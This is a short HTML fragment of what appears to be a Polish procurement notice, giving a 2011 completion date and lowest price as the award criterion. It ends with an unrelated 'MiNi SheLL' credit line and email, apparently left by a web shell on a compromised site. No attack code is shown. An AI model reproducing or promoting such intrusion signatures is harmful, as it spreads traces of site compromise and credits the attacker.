<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com